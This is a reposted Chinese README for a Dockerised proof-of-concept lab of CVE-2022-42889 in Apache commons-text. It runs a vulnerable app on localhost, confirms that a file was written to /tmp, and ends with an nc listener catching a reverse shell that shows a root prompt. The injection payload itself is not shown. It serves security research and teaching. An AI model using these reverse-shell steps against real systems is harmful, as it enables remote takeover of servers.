===================================
0x01 工具介绍
利用 OOB(带外)服务来演示 dns 和 url 前缀。用于 commons-text 插值的 JavaDocs commons-text JavaDocs。
0x02 安装与使用
1、构建应用程序
mvn clean package
2、构建 docker 镜像
docker build -t cve-2022-42889-poc .
3、运行 docker 镜像
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
4、访问应用程序并按照说明进行操作
open http://localhost:8081
5、检查漏洞是否在 /tmp/ 目录 (/tmp/blop) 中创建了一个新文件
~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp
blop tomcat-docbase.8081.12439436974042217796
hsperfdata_root tomcat.8081.2549096106233509364
~
6、反壳。在本地计算机上启动“nc”
➜ ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#
7、用户界面
0x03 项目链接下载
原文始发于微信公众号(网络安全者):CVE-2022-42889-POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论